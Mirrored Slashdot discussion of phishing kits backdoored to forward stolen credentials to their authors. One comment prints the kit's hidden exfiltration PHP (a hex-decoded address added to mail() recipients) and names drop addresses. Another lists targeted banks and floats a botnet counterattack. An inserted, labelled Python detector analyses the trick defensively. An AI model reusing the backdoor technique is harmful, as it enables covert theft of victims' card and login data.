Slashdot Mirror


Phishing Group Caught Stealing From Other Phishers

An anonymous reader writes "Netcraft has written about a website offering free phishing kits with one ironic twist — they all contain backdoors to steal stolen credentials from the fraudsters that deploy them. Deliberately deceptive code inside the kits means that script kiddies are unlikely to realize that any captured credit card numbers also end up getting sent to the people who made the phishing kits. The same group was also responsible for another backdoored phishing kit used against Bank of America earlier this month."

33 of 129 comments

  1. How times have changed: you can't trust.....wait! by whoever57 · · Score: 3, Interesting

    But seriously, this is good news! It is always good news (for law-abiding people) when crooks start feeding off each other.

    --
    The real "Libtards" are the Libertarians!
  2. Share by Anonymous Coward · · Score: 4, Funny

    Hey, it's open source. Information wants to be free. It's all about sharing. Why shouldn't the developer of the phishing kit get some reward from the organization that profits from repackaging his code?

    If they really wanted to do it right, they could just pool all their resources and split the rewards. They could even invite others to join in, with a BotNet@Home project. Lend your computer to the BotNet, and get a prorated share of the take from stolen credit cards credited to your PayPal account.

    1. Re:Share by nacturation · · Score: 2, Funny

      They could release it under the GNU General Phishing License.

      --
      Want to improve your Karma? Instead of "Post Anonymously", try the "Post Humously" option.
  3. In soviet russia... by Anonymous Coward · · Score: 5, Funny

    ...phishers phish phishers... Say that five times fast.

    1. Re:In soviet russia... by Anonymous Coward · · Score: 2, Funny

      "that that that that that"

      Not so hard...

  4. Re:How times have changed: you can't trust.....wai by cortesoft · · Score: 5, Interesting

    Except they are actually double feeding off innocent people.... some poor chap's info gets stolen by both the guy who deployed the phishing kit and the guy who wrote it.... which means it's probably at least twice as likely to get used for fraud.

  5. Proverb by OldManAndTheC++ · · Score: 5, Funny

    Phish from a man and you take advantage of him for a day.

    Give a man a phishing kit and you take advantage of him for a lifetime.

    (of course by "man" we mean spotty-faced script kiddie, and by "lifetime" we mean until he wipes his hard disk, but proverbs are meant to be pithy and brief, not accurate.)

    --
    Soylent Green is peoplicious!
  6. Re:How times have changed: you can't trust.....wai by v1 · · Score: 4, Insightful

    they aren't really feeding off each other, just more off YOU. Both thieves get a crack at your cc#. Would you rather have rung up $4000 on your card, or $8000?

    --
    I work for the Department of Redundancy Department.
  7. Mr-Brain's site by aerthling · · Score: 5, Informative

    Here's his site: http://thebadboys.org/Brain/

  8. This is really sad.. by DigitAl56K · · Score: 5, Interesting

    .. you just can't trust malware anymore!

    Really though, this is nothing new. IIRC, some builds of Sub7 had a reverse backdoor (not covered in the wiki article), as well as a master password that let the Sub7 crew take over a server (covered by the wiki article), and some builds even included hard drive killer when the master password was in use.

  9. Nuke the phishers by enoz · · Score: 4, Insightful

    What is stopping a law enforcement agency from putting out a 'phishing' kit that actually phished the phishers?

    It reminds me of the ol' days on instant messaging when people would pass around a supposed 'Nuke' program that would allow them to reboot people's computers, only to discover that their own computer crashed soon after.

    1. Re:Nuke the phishers by FLEB · · Score: 4, Informative

      What is stopping a law enforcement agency from putting out a 'phishing' kit that actually phished the phishers?

      The law, mostly. It's just as illegal for someone to make "counter-malware" to break into a computer uninvited as it is for anyone else to make malicious software that breaks in.

      --
      Information wants to be free.
      Entertainment wants to be paid.
      You just want to be cheap.
  10. Re:How times have changed: you can't trust.....wai by GroeFaZ · · Score: 3, Insightful

    Problem is, they're not feeding on each other; the feeding order is not circular, but rather pyramidal. The smart and resourceful ones get even richer through the bottom-feeders' "work".

    --
    The grass is always greener on the other side of the light cone.
  11. Re:I wish it were possible to zoom in... by Anonymous Coward · · Score: 3, Funny

    I wait until I am at work to read those emails, I'm not going to risk my own computers.

  12. Re:I wish it were possible to zoom in... by Mr. Roadkill · · Score: 5, Informative

    Naturally Netcraft won't tell you the real site name :-)
    Naturally. And who can blame them? I certainly don't - who knows what kind of nasties they might have lurking on those pages waiting for unsuspecting CEOs and CIOs and security experts who ought to know better?

    However, Google is your friend. Within 30 seconds of looking over the Netcraft article for helpfully unique strings, I found it. And went looking with lynx :-) I won't give the URL, to protect the stupid from themselves, but it's not that hard to find.

    They've got ready-rolled scams for abbey.co.uk, bankofamerica.com, cahoot.co.uk, chase.com, egold.com, ebay.com, hsbc.co.uk, lloydstsb.com, moneybookers.com, nationwide.co.uk, nbk.com.kw, paypal.com, regions.com, stgeorge.com.au, wachovia.com and westernunion.com - and in some cases, they have more than one for particular organisations.

    Cool. Now who has a spare botnet, is willing to wade through this arsehole's source, and is willing to send garbage values to al-brain@hotmail.fr and albrain08@yahoo.fr?
  13. Just what is stopping law enforcement? by swb · · Score: 3, Interesting

    Don't you ever wonder why there have been so few significant arrests of spammers/phishers/etc?

    Isn't it trivial for a government agency like the FBI or Treasury to track payments charged to any kind of electronic banking back to the recipient? Wouldn't an investigation "following the money" ultimately lead you to either the thief or at least greatly disrupt his activities? At a minimum it would expose the people that made their transactions work (banks, hosting companies, other otherwise "normal" business people).

    A couple of decent RICO prosecutions and you would drive this stuff out of the United States and greatly reduce the scale of it.

    But it never happens, and I can only think that somehow the government has turned these people into some espionage rabbit hole and high level prosecutions would disrupt intelligence gathering. Because there is little reason the government couldn't do something about it if they wanted to.

    1. Re:Just what is stopping law enforcement? by ShaunC · · Score: 4, Informative

      Don't you ever wonder why there have been so few significant arrests of spammers/phishers/etc?
      No, not really.

      For the most part, these have been made federal crimes, even to the extent of superseding existing state laws. A few years ago, several states had passed fairly strong anti-spam laws. If someone violated the law, you could file against them in your local small claims court, and secure a guaranteed judgement (good luck collecting, but that's another story) if they didn't show. Slashdot regular Bennett Haselton made boilerplate of that process, as I recall. Then along came CAN-SPAM, which created huge loopholes and essentially declared that individual state laws about spam, if less tolerant than the federal statute, were no longer enforceable.

      So now it's up to the feds to prosecute spammers, phishers, and other ill-willed malfeasants. Most of the time, the feds have better things to worry about, and unless you personally can prove tens of thousands in damages, they're unlikely to raise an eyebrow. You do remember how the FBI's last few technology initiatives turned out, right? The penultimate example being "Virtual Case File," a/k/a "Virtual Money Sink." What amounts to a data warehouse with a client app to query it, $200 million later and it's scrapped. Two hundred MILLION dollars down the drain on a failed initiative to, in essence, secure some data feeds, create some transformations, and develop a GUI to query the whole shebang. You really expect these guys to track down John Dodrescu in Romania who's spoofing a Bank of America website on some zombie PCs in Italy, oh wait, that was 10 minutes ago before the TTL on the DNS expired, now it's some zombie PCs in France?

      Give me, a non-gov IT professional, a team of 10 people of my choosing, fund me with one single million dollars and some travel vouchers, and agree to keep the project going for one year. A lot of these assholes will be out of business inside of 6 months, with many of their contemporaries scared shitless of becoming the next statistic. No fatalities, just a lot of people behind bars. But the federal government doesn't work that way because as many of us are well aware, it isn't profitable to run an IT department. They'd rather hire 1,000 guys who may or may not be able to tell you which of (XM|XP|XTC) is a version of Windows, at $50K a year apiece, then bitch and moan that they can't stop the problem with $50mil so they can justify a bigger budget next year.

      America is spending more money per day in Iraq than it would take to adequately investigate, build cases against, and convict all of the prolific spammers in the entire world.

      No, I don't often wonder why these problems haven't been solved. The federal government has been tasked with solving them, and that's all the why I need.
      --
      Thanks to the War on Drugs, it's easier to buy meth than it is to buy cold medicine!
    2. Re:Just what is stopping law enforcement? by gujo-odori · · Score: 2, Informative

      Speaking as someone in the security industry and very closely involved with anti-phishing efforts, I have to say that the million dollars and the team of 10 wouldn't do you much good, because the phishers are not only not in the United States or Canada, where they would be relatively easy to apprehend, but are almost all in Russia, Romania, and other eastern European countries where even catching them, let alone getting them prosecuted is a much more difficult proposition. Extradition? Forget it.

      The only way a team like that might be effective is if it were a hit squad, but even then, there are just too many phishers to assassinate.

      LE has a lot more than 10 people working on this and spends far more than a million dollars a year on it, and look how hard it is to get arrests, prosecutions, and convictions (there have been some, but they are hard to get). What makes you think you could do better with only 10 people, a million bucks, and no stated LE experience, and meet all the evidentiary requirements to get a prosecution and a conviction? You'll pardon me if I take your claim with quite a few grains of salt.

      I've personally met FBI special agents who work on this area. Believe me, they know far more about this than you do, and have resources your hypothetical million dollars couldn't get you. Heck, that million bucks would just cover the salary and benefits of that team of ten (assuming they work cheap; it wouldn't cover salary and benefits for 10 people who make what I make), without even getting into any external costs of forensic lab services, equipment purchases, etc. And even if you did do better research work than the FBI, good luck convincing an eastern European police agency to follow it up after you email them about it.

  14. Re:How times have changed: you can't trust.....wai by bhmit1 · · Score: 4, Insightful

    But seriously, this is good news! It is always good news (for law-abiding people) when crooks start feeding off each other.
    This would only be a good thing if phishers were stealing the account information of other phishers. But since they are just spreading your number to more phishers, your best hope is that competing phishers raise the fraud alert on your credit cards faster (credit card companies look for unusual purchases, and placing multiple orders in stores on opposite sides of the country at the same time is a pretty easy flag for them).

    Personally, I still want to see financial institutions implement a system where you can get trojan account numbers to give to the phishers that appear just like real numbers. If the phisher uses them, immediately the institution knows to look for fraudulent activity from that source. Then everyone receiving this spam can provide so many bad account numbers that phishing is very difficult to do without drawing attention to yourself.
  15. Phishing... by Derek Loev · · Score: 3, Interesting

    It's amazing how many large websites are so vulnerable to even basic attacks. SQL Injection is still rampant (a simple well devised Google search can show you that) and many corporations leave credit card numbers unencrypted. Somebody with basic knowledge of SQL could attack a large number of organizations without any trouble. I've seen this happen to too many people for me to ever trust important information on smaller sites.

  16. This isn't the same... by TheGreatHegemon · · Score: 3, Insightful

    In the old days, if thieves stole from thieves, it meant the first thief was deprived of the stolen goods. This led to conflict. However, with information like this, all it means is that *two* thieves have the same info.

  17. Re:How times have changed: you can't trust.....wai by cart_man4524 · · Score: 2, Funny

    Hmmm.... reminds me of something very familiar. Oh yeah.... it sounds like American Business, so what's the problem?

  18. Re:How times have changed: you can't trust.....wai by morethanapapercert · · Score: 2, Interesting

    There is one slight flaw with that plan. How does a victim know when to give the trojan CC# and when to give the real one? The whole point of phishing is to look as safe and legit as possible*. If, for example, my mother-in-law gets an email from Mr. BadGuy Phisher offering (of all things) heavily discounted embroidery pattern files for her embroidery machine. She thinks he really has such files for sale, she actually does want the product, so she provides her real CC# and not the false one. Now, this is a woman who is keenly aware of the potential for credit card fraud and identity theft. I have seen her save all of her receipts and manual charge slips in a shopping bag so her husband can burn them out in the shop. She is convinced that Bad Men are rooting through trash to collect CCs and banking info. She is convinced that these Bad Men are somehow able to access her account based on the string of numbers that appear on the receipt when she uses her debit card.

    Yet, despite this paranoia, she still buys hordes of knick-knacks, limited edition "collectibles", sewing supplies and such on eBay. PayPal being too scary for her, she uses her CC to pay for all of that. Try as I might, I can't seem to persuade her that a person in CA selling cutesy crocheted animal sweaters could be a Bad Man just as easily as some person rooting through her trash. As for email based scams; well, I set up her email client to reject anyone not already in her address book and have trained her in the habit of sending the initial email to them, rather than waiting until she gets one. As a major side benefit for me, it has drastically cut down the number of "cute", "humorous" or "inspirational" forwards she sends me.

    *The bar to appear safe and legit enough for some users can be staggeringly low. Let's face it, there are always going to be some stupid people around.

    --
    I need a wheelchair van for my son. Help me get the word out. https://www.gofundme.com/wheelchair-van-for-jj
  19. funny by timmarhy · · Score: 2, Funny

    what's the world come to when you can't trust someone selling phishing software!

    --
    If you mod me down, I will become more powerful than you can imagine....
  20. Re:Script kiddies? by DigitAl56K · · Score: 3, Interesting

    This is pretty much the correct usage.

    From Wikipedia:

    In hacker culture, a script kiddie (occasionally script bunny, skidie, script kitty, script-running juvenile (SRJ), or similar) is a derogatory term used for an inexperienced malicious cracker who uses programs developed by others to attack computer systems, and deface websites. It is generally assumed that script kiddies are kids who lack the ability to write sophisticated hacking programs on their own,[1] and that their objective is to try to impress their friends or gain credit in underground cracker communities.

    And that's exactly what's happening.

  21. Re:How times have changed: you can't trust.....wai by morcego · · Score: 4, Interesting

    Personally, I still want to see financial institutions implement a system where you can get trojan account numbers to give to the phishers that appear just like real numbers. If the phisher uses them, immediately the institution knows to look for fraudulent activity from that source.

    One of my ATM cards has 2 different PIN numbers. If I use the alternative one, the transaction is completed normally (so no one on the spot gets wiser), but the institution will flag it and notify the police at once, providing my identity and location. I have to pay a little extra for it (about US$ 3/month), but it is well worth it. It is considered (and marketed as) an insurance. I have had this since 1996, and I'm happy to say I never needed it.

    So yes, the banks know this kind of thing can be done. I wonder why other institutions don't do it or even why this is not mandatory for all cards.

    I really don't mind the extra US$ 3/month for this service.
    --
    morcego
  22. The real backdoor email address... by Anonymous Coward · · Score: 2, Informative

    It looks like you too have been misled by the code. The email addresses al-brain@hotmail.fr and albrain08@yahoo.fr are the ones that the 'script kiddies' are meant to change before using the phishing kit. The backdoor email address is actually encoded within the other scripts.

    Looking at the code more carefully you'll see:

    details.php includes this in the phishing page form:

    logon.php has these lines of code:
        $d="details.php";
        $erorr=file_get_contents($d);
        $IP=pack("H*", substr($VARS=$erorr,strpos($VARS, "102")+3,46));

    and Mr-Brain.php has this:
        $send="al-brain@hotmail.fr,albrain08@yahoo.fr";
        $str=array($send, $IP);
        foreach ($str as $send)
            mail($send,$subject,$message,$headers);

    Basically, it pulls the "niarB" value from the page, decodes it, and then it is included in the array of email addresses that the details get mailed to.

    The Brain's backdoor email address turns out to be: pioneer.brain@gmail.com
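
A kit-analysis helper for the trick described in this comment, written as an added example (not code from the post or from the kit): it replays the quoted logon.php extraction (46 hex characters after the first "102" marker, decoded as pack("H*") does) and also runs a kit-independent scan for any hex run that decodes to an e-mail address, so a responder triaging a kit pulled off a compromised host sees the hidden drop address next to the visible ones. The sample kit files and the hidden address hidden-drop@example.org are constructed placeholders.

```python
import re
from typing import Dict, Optional, Set

# Constructed sample kit, modelled on the snippets quoted in the comment above.
# The hidden "niarB" value is the marker "102" followed by the hex encoding of
# a placeholder address (23 bytes -> 46 hex chars), not the address named
# in the thread.
HIDDEN_ADDR = "hidden-drop@example.org"
SAMPLE_KIT: Dict[str, str] = {
    "details.php": (
        '<form action="logon.php" method="post">\n'
        '<input type="text" name="user">\n'
        '<input type="hidden" name="niarB" value="102'
        + HIDDEN_ADDR.encode("ascii").hex() + '">\n'
        "</form>\n"
    ),
    "Mr-Brain.php": (
        "<?php\n"
        '$send="al-brain@hotmail.fr,albrain08@yahoo.fr";\n'
        "$str=array($send, $IP);\n"
        "foreach ($str as $send)\n"
        "    mail($send,$subject,$message,$headers);\n"
    ),
}

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
HEX_RUN_RE = re.compile(r"[0-9a-fA-F]{20,}")  # long runs of hex digits


def kit_extract(details_src: str) -> Optional[str]:
    """Replay the quoted logon.php logic: 46 hex characters after the first
    "102" in details.php, decoded the way pack("H*") would."""
    pos = details_src.find("102")
    if pos < 0:
        return None
    try:
        return bytes.fromhex(details_src[pos + 3 : pos + 49]).decode("ascii")
    except ValueError:  # not hex, or not ASCII text
        return None


def hidden_addresses(src: str) -> Set[str]:
    """Kit-independent check: any long hex run that decodes to an e-mail
    address. Both byte alignments are tried because a marker prefix such as
    "102" shifts the byte boundary by one hex digit."""
    found: Set[str] = set()
    for m in HEX_RUN_RE.finditer(src):
        run = m.group(0)
        for start in (0, 1):
            chunk = run[start:]
            chunk = chunk[: len(chunk) - len(chunk) % 2]
            if chunk:
                text = bytes.fromhex(chunk).decode("ascii", errors="replace")
                found.update(EMAIL_RE.findall(text))
    return found


def find_exfil_addresses(kit: Dict[str, str]) -> Dict[str, Set[str]]:
    """Split the addresses a kit mails to into the visible ones the deployer
    is meant to edit and the hex-hidden ones that form the backdoor."""
    visible: Set[str] = set()
    hidden: Set[str] = set()
    for src in kit.values():
        visible.update(EMAIL_RE.findall(src))
        hidden.update(hidden_addresses(src))
    return {"visible": visible, "hidden": hidden - visible}


if __name__ == "__main__":
    print("kit logic decodes:", kit_extract(SAMPLE_KIT["details.php"]))
    print(find_exfil_addresses(SAMPLE_KIT))
```

Run it against the PHP files of a recovered kit (read each file into the dict) and block or monitor every address in both sets, not only the visible ones.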

  23. Re:How times have changed: you can't trust.....wai by nacturation · · Score: 3, Informative

    I have to pay a little extra for it (about US$ 3/month), but it is well worth it. It is considered (and marketed as) an insurance. I have had this since 1996, and I'm happy to say I never needed it.
    I have a solution as well: use your credit card so that there's no liability to you even if someone does use it fraudulently. And since 1996, you've spent about $400 on this insurance you didn't need. The only time I could see that as being useful is if someone robs you while you're in the process of making a withdrawal at an ATM.
    --
    Want to improve your Karma? Instead of "Post Anonymously", try the "Post Humously" option.
  24. Re:How times have changed: you can't trust.....wai by mh1997 · · Score: 2, Interesting

    they aren't really feeding off each other, just more off YOU. Both thieves get a crack at your cc#. Would you rather have rung up $4000 on your card, or $8000?
    It really does not matter how much is fraudulently charged on my credit card. I am not responsible for either amount.

    Looking at the larger picture, I want as small an amount of fraud as possible because the cost of goods will be cheaper. Somebody has to recoup that $4000 or $8000 in your example, but what happens is that everyone pays for fraud; spread out over every purchase made, it is probably lower than the sales tax you pay on each individual transaction.

    For what it's worth, I have found a way to never have my credit card info stolen - I use cash. For you conspiracy minded people out there, my purchases are not trackable. Even better, the amount of debt I have is $0 which comes out to $0 per month in interest with a grand total of $0 per year. You'd also be amazed at the businesses (big box stores and little local stores) that will give you a discount for cash if you ask.

  25. Re:How times have changed: you can't trust.....wai by Zeinfeld · · Score: 2, Interesting

    Problem is, they're not feeding on each other; the feeding order is not circular, but rather pyramidal. The smart and resourceful ones get even richer through the bottom-feeders' "work".

    Exactly, in the chat rooms the criminals are far more worried about each other than the forces of law and order. OK, they are concerned that the person might be from a security company (our guys) or a police officer. But they are rather more angry about 'rippers', criminals who take the money but never deliver the goods or take goods and don't pay for them.

    In the Shadowcrew organization about a third of the management team was occupied as enforcers. In fact, that is how they got caught: they ended up in a turf war and someone turned them in to police.

    As in all criminal organizations the guys at the bottom get chicken feed. All the money flows up the pyramid, just like the Sopranos. A street drug dealer is likely to be in prison or dead in two to three years on average and makes less than minimum wage. The typical botnet herder makes less than they would flipping burgers. All the money flows up.

    --
    Looking for an Information Security student project suggestion?
    Try http://dotcrimeManifesto.com/
  26. Re:How times have changed: you can't trust.....wai by morcego · · Score: 2

    There is a new fad around criminals in my country that is called "flash kidnapping" (loose translation). They grab you, put a gun to your head, and drive you around to several ATM machines.

    --
    morcego
  27. Re:How times have changed: you can't trust.....wai by skarphace · · Score: 2, Insightful

    For what it's worth, I have found a way to never have my credit card info stolen - I use cash. For you conspiracy minded people out there, my purchases are not trackable. Even better, the amount of debt I have is $0 which comes out to $0 per month in interest with a grand total of $0 per year.
    That doesn't keep ID theft from happening. Someone gets your SSN and opens up an account in your name, you're screwed anyway.

    Just do what I did, open up a bunch of cards, bury yourself, get bad credit. You can't open up accounts if your credit sucks. heh
    --
    Bullish Machine Tzar
  28. Re:How times have changed: you can't trust.....wai by markov_chain · · Score: 2, Informative

    Citibank has this feature. They call it "Virtual Account Numbers."

    --
    Tsunami -- You can't bring a good wave down!